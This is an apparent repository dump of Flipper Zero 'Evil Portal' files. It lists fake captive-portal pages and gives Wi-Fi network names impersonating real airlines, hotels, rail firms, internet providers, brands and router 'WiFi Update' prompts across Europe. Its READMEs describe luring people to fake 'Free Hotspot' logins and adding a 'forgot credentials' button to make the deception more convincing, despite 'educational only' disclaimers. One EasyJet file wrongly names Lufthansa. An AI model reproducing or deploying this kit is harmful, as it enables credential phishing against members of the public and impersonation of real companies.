├── Gyms ├── readme.md ├── McFIT │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Neoness │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Basic-Fit │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Holmes Place │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ ├── README.md │ └── index.html ├── Fitness First │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md └── Anytime Fitness │ ├── ap.config.txt │ ├── WithForgotCredentials │ └── ap.config.txt │ └── README.md ├── Airlines ├── KLM │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ ├── README.md │ └── index.html ├── Air France │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ ├── ap.config.txt │ │ └── index.html │ ├── README.md │ └── index.html ├── EasyJet │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── SwissAir │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ ├── README.md │ └── index.html ├── Lufthansa │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Ryanair │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── British Airways │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Turkish Airlines │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ ├── README.md │ └── index.html ├── Brussels Airlines │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ ├── ap.config.txt │ │ └── index.html │ ├── README.md │ └── index.html └── README.md ├── Brands ├── Nike │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ ├── ap.config.txt │ │ └── index.html │ ├── README.md │ └── index.html ├── Apple │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ ├── ap.config.txt │ │ └── index.html │ ├── README.md │ └── index.html ├── Carlsberg │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Coca-Cola │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Red Bull │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md └── README.md ├── Supermarkets ├── IKEA │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Delhaize │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ ├── README.md │ └── index.html └── Tesco │ ├── ap.config.txt │ ├── WithForgotCredentials │ └── ap.config.txt │ └── README.md ├── Theme Parks ├── Walibi │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Efteling │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Disneyland Paris │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md └── README.md ├── Hotels ├── Hilton │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Sheraton │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Ibis Hotels │ ├── ap.config.txt │ └── WithForgotCredentials │ │ └── ap.config.txt ├── Novotel │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Radisson │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Best Western Hotels │ ├── ap.config.txt │ ├── WithForgottenCredentials │ │ └── ap.config.txt │ └── README.md └── README.md ├── Fast Foods & coffeeshops ├── KFC │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Quick │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── McDonald's │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── index.html ├── Pizza Hut │ ├── ap.config.txt │ ├── WithForgottenCredentials │ │ ├── ap.config.txt │ │ └── index.html │ ├── README.md │ └── index.html └── Starbucks Coffee │ ├── ap.config.txt │ ├── WithForgotCredentials │ └── ap.config.txt │ └── README.md ├── Railway Companies ├── Thalys │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── Deutsche Bahn │ ├── ap.config.txt │ ├── GermanVersion │ │ ├── ap.config.txt │ │ └── GermanVersionWithForgotCreds │ │ │ └── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── SNCF (French Rail) │ ├── ap.config.txt │ ├── FrenchVersion │ │ ├── ap.config.txt │ │ └── FrenchVersionWithForgotCreds │ │ │ └── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── renfe (Spanish Rail) │ ├── ap.config.txt │ ├── SpanishVersion │ │ ├── ap.config.txt │ │ └── SpanishVersionWithForgotCreds │ │ │ └── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── README.md ├── SNCB-NMBS (Belgian Rail) │ ├── ap.config.txt │ ├── DutchVersion │ │ ├── ap.config.txt │ │ ├── DutchVersionWithForgotCreds │ │ │ └── ap.config.txt │ │ └── index.html │ ├── FrenchVersion │ │ ├── ap.config.txt │ │ ├── FrenchVersionWithForgotCreds │ │ │ └── ap.config.txt │ │ └── index.html │ ├── WithForgotCredentials │ │ └── ap.config.txt │ ├── README.md │ └── index.html ├── National Rail (UK) │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ ├── ap.config.txt │ │ └── index.html │ ├── README.md │ └── index.html └── Nederlandse Spoorwegen (Dutch Rail) │ ├── ap.config.txt │ ├── DutchVersion │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ ├── ap.config.txt │ │ └── index.html │ └── index.html │ ├── WithForgotCredentials │ ├── ap.config.txt │ └── index.html │ ├── README.md │ └── index.html ├── WiFi Routers ├── D-Link │ └── ap.config.txt ├── Linksys │ ├── ap.config.txt │ └── index.html ├── NETGEAR │ ├── ap.config.txt │ └── index.html ├── TP-Link │ └── ap.config.txt ├── Tenda │ └── ap.config.txt ├── Ubiquiti-Unify │ ├── ap.config.txt │ └── index.html ├── Apple AirPort │ └── ap.config.txt └── README.md ├── Internet Providers ├── British Telecom │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── index.html ├── Nos │ └── ap.config.txt ├── Orange™ │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ ├── ap.config.txt │ │ └── index.html │ └── index.html ├── Proximus │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ └── index.html ├── Telefónica │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ └── ap.config.txt │ ├── SpanishVersion │ │ ├── ap.config.txt │ │ └── SpanishVersionWithForgotCreds │ │ │ └── ap.config.txt │ └── README.md ├── Vodafone │ ├── ap.config.txt │ ├── WithForgotCredentials │ │ ├── ap.config.txt │ │ └── index.html │ └── index.html ├── Deutsche Telekom │ ├── ap.config.txt │ ├── GermanVersion │ │ ├── ap.config.txt │ │ ├── GermanVersionWithForgotCreds │ │ │ ├── ap.config.txt │ │ │ └── index.html │ │ └── index.html │ ├── WithForgotCredentials │ │ ├── ap.config.txt │ │ └── index.html │ ├── README.md │ └── index.html └── README.md ├── LICENSE └── README.md /Gyms/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Airlines/KLM/ap.config.txt: -------------------------------------------------------------------------------- 1 | KLM WiFi -------------------------------------------------------------------------------- /Brands/Nike/ap.config.txt: -------------------------------------------------------------------------------- 1 | Just do it -------------------------------------------------------------------------------- /Gyms/McFIT/ap.config.txt: -------------------------------------------------------------------------------- 1 | McFIT WiFi -------------------------------------------------------------------------------- /Gyms/Neoness/ap.config.txt: -------------------------------------------------------------------------------- 1 | Neoness WiFi -------------------------------------------------------------------------------- /Gyms/Basic-Fit/ap.config.txt: -------------------------------------------------------------------------------- 1 | BASIC-FIT WiFi -------------------------------------------------------------------------------- /Supermarkets/IKEA/ap.config.txt: -------------------------------------------------------------------------------- 1 | IKEA WiFi -------------------------------------------------------------------------------- /Theme Parks/Walibi/ap.config.txt: -------------------------------------------------------------------------------- 1 | Walibi WiFi -------------------------------------------------------------------------------- /Airlines/Air France/ap.config.txt: -------------------------------------------------------------------------------- 1 | Air France WiFi -------------------------------------------------------------------------------- /Airlines/EasyJet/ap.config.txt: -------------------------------------------------------------------------------- 1 | Lufthansa WiFi -------------------------------------------------------------------------------- /Airlines/SwissAir/ap.config.txt: -------------------------------------------------------------------------------- 1 | Swiss Hotspot -------------------------------------------------------------------------------- /Brands/Apple/ap.config.txt: -------------------------------------------------------------------------------- 1 | Apple Free Hotspot -------------------------------------------------------------------------------- /Gyms/Holmes Place/ap.config.txt: -------------------------------------------------------------------------------- 1 | Holmes Place WiFi -------------------------------------------------------------------------------- /Hotels/Hilton/ap.config.txt: -------------------------------------------------------------------------------- 1 | Hilton Guest WiFi -------------------------------------------------------------------------------- /Hotels/Sheraton/ap.config.txt: -------------------------------------------------------------------------------- 1 | Sheraton Guest Wifi -------------------------------------------------------------------------------- /Supermarkets/Delhaize/ap.config.txt: -------------------------------------------------------------------------------- 1 | Delhaize WiFi -------------------------------------------------------------------------------- /Supermarkets/Tesco/ap.config.txt: -------------------------------------------------------------------------------- 1 | Tesco Hotspot -------------------------------------------------------------------------------- /Theme Parks/Efteling/ap.config.txt: -------------------------------------------------------------------------------- 1 | Efteling WiFi -------------------------------------------------------------------------------- /Airlines/Lufthansa/ap.config.txt: -------------------------------------------------------------------------------- 1 | Lufthansa WiFi 2 | -------------------------------------------------------------------------------- /Airlines/Ryanair/ap.config.txt: -------------------------------------------------------------------------------- 1 | Ryanair Free WiFi 2 | -------------------------------------------------------------------------------- /Brands/Carlsberg/ap.config.txt: -------------------------------------------------------------------------------- 1 | Carlsberg Free WiFi -------------------------------------------------------------------------------- /Brands/Coca-Cola/ap.config.txt: -------------------------------------------------------------------------------- 1 | Coca-Cola Free WiFi -------------------------------------------------------------------------------- /Brands/Red Bull/ap.config.txt: -------------------------------------------------------------------------------- 1 | Red Bull gives you WiFi -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/KFC/ap.config.txt: -------------------------------------------------------------------------------- 1 | KFC Hotspot -------------------------------------------------------------------------------- /Gyms/Fitness First/ap.config.txt: -------------------------------------------------------------------------------- 1 | Fitness First WiFi -------------------------------------------------------------------------------- /Hotels/Ibis Hotels/ap.config.txt: -------------------------------------------------------------------------------- 1 | Ibis Hotel Guest WiFi -------------------------------------------------------------------------------- /Hotels/Novotel/ap.config.txt: -------------------------------------------------------------------------------- 1 | Novotel Guest Wifi 2 | -------------------------------------------------------------------------------- /Railway Companies/Thalys/ap.config.txt: -------------------------------------------------------------------------------- 1 | Thalys Hotspot -------------------------------------------------------------------------------- /WiFi Routers/D-Link/ap.config.txt: -------------------------------------------------------------------------------- 1 | D-Link WiFi Update -------------------------------------------------------------------------------- /WiFi Routers/Linksys/ap.config.txt: -------------------------------------------------------------------------------- 1 | Linksys WiFi Update -------------------------------------------------------------------------------- /WiFi Routers/NETGEAR/ap.config.txt: -------------------------------------------------------------------------------- 1 | NETGEAR WiFi Update -------------------------------------------------------------------------------- /WiFi Routers/TP-Link/ap.config.txt: -------------------------------------------------------------------------------- 1 | TP-Link WiFi Update -------------------------------------------------------------------------------- /WiFi Routers/Tenda/ap.config.txt: -------------------------------------------------------------------------------- 1 | Tenda WiFi Update -------------------------------------------------------------------------------- /Airlines/KLM/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | KLM WiFi -------------------------------------------------------------------------------- /Brands/Nike/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Just do it -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/Quick/ap.config.txt: -------------------------------------------------------------------------------- 1 | Quick WiFi -------------------------------------------------------------------------------- /Gyms/Anytime Fitness/ap.config.txt: -------------------------------------------------------------------------------- 1 | Anytime Fitness WiFi -------------------------------------------------------------------------------- /Gyms/McFIT/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | McFIT WiFi -------------------------------------------------------------------------------- /Hotels/Radisson/ap.config.txt: -------------------------------------------------------------------------------- 1 | Radisson Hotel Guest WiFi -------------------------------------------------------------------------------- /Internet Providers/British Telecom/ap.config.txt: -------------------------------------------------------------------------------- 1 | BT WIFI -------------------------------------------------------------------------------- /Internet Providers/Nos/ap.config.txt: -------------------------------------------------------------------------------- 1 | Wifi-Nos-Gratis 2 | -------------------------------------------------------------------------------- /WiFi Routers/Ubiquiti-Unify/ap.config.txt: -------------------------------------------------------------------------------- 1 | UI WiFi Update -------------------------------------------------------------------------------- /Airlines/British Airways/ap.config.txt: -------------------------------------------------------------------------------- 1 | British Airways Free WiFi -------------------------------------------------------------------------------- /Airlines/Turkish Airlines/ap.config.txt: -------------------------------------------------------------------------------- 1 | Turkish Airlines Hotspot -------------------------------------------------------------------------------- /Brands/Apple/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Apple Hotspot -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/McDonald's/ap.config.txt: -------------------------------------------------------------------------------- 1 | McDonald's -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/Pizza Hut/ap.config.txt: -------------------------------------------------------------------------------- 1 | Pizza Hut WiFi -------------------------------------------------------------------------------- /Gyms/Neoness/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Neoness WiFi -------------------------------------------------------------------------------- /Internet Providers/Orange™/ap.config.txt: -------------------------------------------------------------------------------- 1 | Orange Free Hotspot -------------------------------------------------------------------------------- /Internet Providers/Proximus/ap.config.txt: -------------------------------------------------------------------------------- 1 | Proximus Free Hotspot -------------------------------------------------------------------------------- /Internet Providers/Telefónica/ap.config.txt: -------------------------------------------------------------------------------- 1 | Telefónica Hotspot -------------------------------------------------------------------------------- /Internet Providers/Vodafone/ap.config.txt: -------------------------------------------------------------------------------- 1 | Vodafone Free Hotspot -------------------------------------------------------------------------------- /Railway Companies/Deutsche Bahn/ap.config.txt: -------------------------------------------------------------------------------- 1 | Deutsche Bahn WiFi -------------------------------------------------------------------------------- /Railway Companies/SNCF (French Rail)/ap.config.txt: -------------------------------------------------------------------------------- 1 | SNCF WiFi -------------------------------------------------------------------------------- /Railway Companies/renfe (Spanish Rail)/ap.config.txt: -------------------------------------------------------------------------------- 1 | renfe WiFi -------------------------------------------------------------------------------- /Supermarkets/IKEA/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | IKEA WiFi -------------------------------------------------------------------------------- /Theme Parks/Disneyland Paris/ap.config.txt: -------------------------------------------------------------------------------- 1 | Disneyland Paris WiFi -------------------------------------------------------------------------------- /WiFi Routers/Apple AirPort/ap.config.txt: -------------------------------------------------------------------------------- 1 | Apple AirPort Update -------------------------------------------------------------------------------- /Airlines/Brussels Airlines/ap.config.txt: -------------------------------------------------------------------------------- 1 | Brussels Airlines Hotspot -------------------------------------------------------------------------------- /Airlines/EasyJet/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Lufthansa WiFi -------------------------------------------------------------------------------- /Airlines/SwissAir/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Swiss Hotspot -------------------------------------------------------------------------------- /Gyms/Basic-Fit/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | BASIC-FIT WiFi -------------------------------------------------------------------------------- /Hotels/Hilton/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Hilton Guest WiFi -------------------------------------------------------------------------------- /Supermarkets/Tesco/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Tesco Hotspot -------------------------------------------------------------------------------- /Theme Parks/Walibi/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Walibi WiFi -------------------------------------------------------------------------------- /Airlines/Air France/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Air France WiFi -------------------------------------------------------------------------------- /Airlines/Lufthansa/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Lufthansa WiFi 2 | -------------------------------------------------------------------------------- /Brands/Carlsberg/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Carlsberg Free WiFi -------------------------------------------------------------------------------- /Brands/Coca-Cola/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Coca-Cola Free WiFi -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/Starbucks Coffee/ap.config.txt: -------------------------------------------------------------------------------- 1 | Starbucks WiFi -------------------------------------------------------------------------------- /Gyms/Fitness First/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Fitness First WiFi -------------------------------------------------------------------------------- /Gyms/Holmes Place/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Holmes Place WiFi -------------------------------------------------------------------------------- /Hotels/Best Western Hotels/ap.config.txt: -------------------------------------------------------------------------------- 1 | Best Western Hotel Guest WiFi -------------------------------------------------------------------------------- /Hotels/Novotel/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Novotel Guest Wifi 2 | -------------------------------------------------------------------------------- /Hotels/Sheraton/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Sheraton Guest Wifi -------------------------------------------------------------------------------- /Railway Companies/SNCB-NMBS (Belgian Rail)/ap.config.txt: -------------------------------------------------------------------------------- 1 | B-Rail Hotspot -------------------------------------------------------------------------------- /Railway Companies/SNCF (French Rail)/FrenchVersion/ap.config.txt: -------------------------------------------------------------------------------- 1 | SNCF WiFi -------------------------------------------------------------------------------- /Supermarkets/Delhaize/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Delhaize WiFi -------------------------------------------------------------------------------- /Theme Parks/Efteling/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Efteling WiFi -------------------------------------------------------------------------------- /Airlines/Ryanair/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Ryanair Free WiFi 2 | -------------------------------------------------------------------------------- /Brands/Red Bull/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Red Bull gives you WiFi -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/KFC/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | KFC Hotspot -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/Quick/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Quick WiFi -------------------------------------------------------------------------------- /Gyms/Anytime Fitness/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Anytime Fitness WiFi -------------------------------------------------------------------------------- /Hotels/Ibis Hotels/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Ibis Hotel Guest WiFi -------------------------------------------------------------------------------- /Hotels/Radisson/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Radisson Hotel Guest WiFi -------------------------------------------------------------------------------- /Internet Providers/British Telecom/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | BT WIFI -------------------------------------------------------------------------------- /Internet Providers/Deutsche Telekom/ap.config.txt: -------------------------------------------------------------------------------- 1 | Deutsche Telekom Hotspot 2 | -------------------------------------------------------------------------------- /Railway Companies/Deutsche Bahn/GermanVersion/ap.config.txt: -------------------------------------------------------------------------------- 1 | Deutsche Bahn WiFi -------------------------------------------------------------------------------- /Railway Companies/National Rail (UK)/ap.config.txt: -------------------------------------------------------------------------------- 1 | National Railway Hotspot -------------------------------------------------------------------------------- /Railway Companies/Nederlandse Spoorwegen (Dutch Rail)/ap.config.txt: -------------------------------------------------------------------------------- 1 | NS Hotspot -------------------------------------------------------------------------------- /Railway Companies/Thalys/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Thalys Hotspot -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/McDonald's/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | McDonald's -------------------------------------------------------------------------------- /Internet Providers/Orange™/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Orange Free Hotspot -------------------------------------------------------------------------------- /Internet Providers/Telefónica/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Telefónica Hotspot -------------------------------------------------------------------------------- /Railway Companies/SNCB-NMBS (Belgian Rail)/DutchVersion/ap.config.txt: -------------------------------------------------------------------------------- 1 | NMBS Hotspot -------------------------------------------------------------------------------- /Railway Companies/SNCB-NMBS (Belgian Rail)/FrenchVersion/ap.config.txt: -------------------------------------------------------------------------------- 1 | WiFi SNCB -------------------------------------------------------------------------------- /Railway Companies/SNCF (French Rail)/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | SNCF WiFi -------------------------------------------------------------------------------- /Airlines/British Airways/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | British Airways Free WiFi -------------------------------------------------------------------------------- /Airlines/Brussels Airlines/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Brussels Airlines Hotspot -------------------------------------------------------------------------------- /Airlines/Turkish Airlines/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Turkish Airlines Hotspot -------------------------------------------------------------------------------- /Internet Providers/Proximus/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Proximus Free Hotspot -------------------------------------------------------------------------------- /Internet Providers/Telefónica/SpanishVersion/ap.config.txt: -------------------------------------------------------------------------------- 1 | Telefónica Punto de acceso -------------------------------------------------------------------------------- /Internet Providers/Vodafone/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Vodafone Free Hotspot -------------------------------------------------------------------------------- /Railway Companies/Deutsche Bahn/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Deutsche Bahn WiFi -------------------------------------------------------------------------------- /Railway Companies/renfe (Spanish Rail)/SpanishVersion/ap.config.txt: -------------------------------------------------------------------------------- 1 | renfe Punto de acceso -------------------------------------------------------------------------------- /Railway Companies/renfe (Spanish Rail)/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | renfe WiFi -------------------------------------------------------------------------------- /Theme Parks/Disneyland Paris/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Disneyland Paris WiFi -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/Pizza Hut/WithForgottenCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Pizza Hut Free WiFi -------------------------------------------------------------------------------- /Fast Foods & coffeeshops/Starbucks Coffee/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Starbucks WiFi -------------------------------------------------------------------------------- /Internet Providers/Deutsche Telekom/GermanVersion/ap.config.txt: -------------------------------------------------------------------------------- 1 | Deutsche Telekom Hotspot 2 | -------------------------------------------------------------------------------- /Railway Companies/Nederlandse Spoorwegen (Dutch Rail)/DutchVersion/ap.config.txt: -------------------------------------------------------------------------------- 1 | NS Hotspot -------------------------------------------------------------------------------- /Railway Companies/SNCB-NMBS (Belgian Rail)/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | B-Rail Hotspot -------------------------------------------------------------------------------- /Hotels/Best Western Hotels/WithForgottenCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Best Western Hotel Guest WiFi -------------------------------------------------------------------------------- /Railway Companies/National Rail (UK)/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | National Railway Hotspot -------------------------------------------------------------------------------- /Internet Providers/Deutsche Telekom/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | Deutsche Telekom Hotspot 2 | -------------------------------------------------------------------------------- /Railway Companies/Nederlandse Spoorwegen (Dutch Rail)/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | NS Hotspot -------------------------------------------------------------------------------- /Railway Companies/SNCF (French Rail)/FrenchVersion/FrenchVersionWithForgotCreds/ap.config.txt: -------------------------------------------------------------------------------- 1 | SNCF WiFi -------------------------------------------------------------------------------- /Railway Companies/Deutsche Bahn/GermanVersion/GermanVersionWithForgotCreds/ap.config.txt: -------------------------------------------------------------------------------- 1 | Deutsche Bahn WiFi -------------------------------------------------------------------------------- /Railway Companies/SNCB-NMBS (Belgian Rail)/FrenchVersion/FrenchVersionWithForgotCreds/ap.config.txt: -------------------------------------------------------------------------------- 1 | WiFi SNCB -------------------------------------------------------------------------------- /Railway Companies/Nederlandse Spoorwegen (Dutch Rail)/DutchVersion/WithForgotCredentials/ap.config.txt: -------------------------------------------------------------------------------- 1 | NS Hotspot -------------------------------------------------------------------------------- /Railway Companies/SNCB-NMBS (Belgian Rail)/DutchVersion/DutchVersionWithForgotCreds/ap.config.txt: -------------------------------------------------------------------------------- 1 | NMBS Hotspot -------------------------------------------------------------------------------- /Internet Providers/Telefónica/SpanishVersion/SpanishVersionWithForgotCreds/ap.config.txt: -------------------------------------------------------------------------------- 1 | Telefónica Punto de acceso -------------------------------------------------------------------------------- /Railway Companies/renfe (Spanish Rail)/SpanishVersion/SpanishVersionWithForgotCreds/ap.config.txt: -------------------------------------------------------------------------------- 1 | renfe Punto de acceso -------------------------------------------------------------------------------- /Internet Providers/Deutsche Telekom/GermanVersion/GermanVersionWithForgotCreds/ap.config.txt: -------------------------------------------------------------------------------- 1 | Deutsche Telekom Hotspot 2 | -------------------------------------------------------------------------------- /Hotels/README.md: -------------------------------------------------------------------------------- 1 | Various Hotel WiFi portals for European hotels. 2 | For educational purposes only. Not to use on unaware victims. 3 | -------------------------------------------------------------------------------- /Airlines/README.md: -------------------------------------------------------------------------------- 1 | Various Evil Portals for European Airline companies. 2 | For educational purposes only. Not to use on unaware victims. 3 | -------------------------------------------------------------------------------- /Internet Providers/README.md: -------------------------------------------------------------------------------- 1 | Various Evil portals for internet providers over Europe. 2 | For educational purposes only. Not to use on unaware victims. 3 | -------------------------------------------------------------------------------- /Brands/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | These portals are made to emulate various known brand's "Free WiFi" portals. 3 | 4 | ## I only made this to show the capabilities. I mean it when I say this is not meant to be used on real victims, you would be an a**hole if you do it 5 | 6 | ## Happy flippin' 7 | 8 | 9 | -------------------------------------------------------------------------------- /Theme Parks/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | These portals are made to emulate various Theme Park's "Free WiFi" portals. 3 | 4 | ## I only made this to show the capabilities. I mean it when I say this is not meant to be used on real victims, you would be an a**hole if you do it 5 | 6 | ## Happy flippin' 7 | 8 | 9 | -------------------------------------------------------------------------------- /Brands/Apple/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Apple "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | -------------------------------------------------------------------------------- /Brands/Nike/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Nike "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | -------------------------------------------------------------------------------- /Gyms/McFIT/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a McFIT "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | -------------------------------------------------------------------------------- /Airlines/EasyJet/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for an EasyJet "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | -------------------------------------------------------------------------------- /Gyms/Neoness/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Neoness "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | -------------------------------------------------------------------------------- /Hotels/Hilton/README.md: -------------------------------------------------------------------------------- 1 | # !!FOR EDUCATIONAL USES ONLY!! 2 | This one **emulates a portal for a Hilton "Free Hotspot"** using EvilPortal on your Flipper Zero. 3 | 4 | The **HTML in the *"WithForgotCredentials"* file** contains a **"forgot credentials" button on the user side to make it look more realistic**. This button only shows a message inviting them to go on their provider's app if they forgot their login/password. 5 | ## Happy flippin' 6 | 7 | 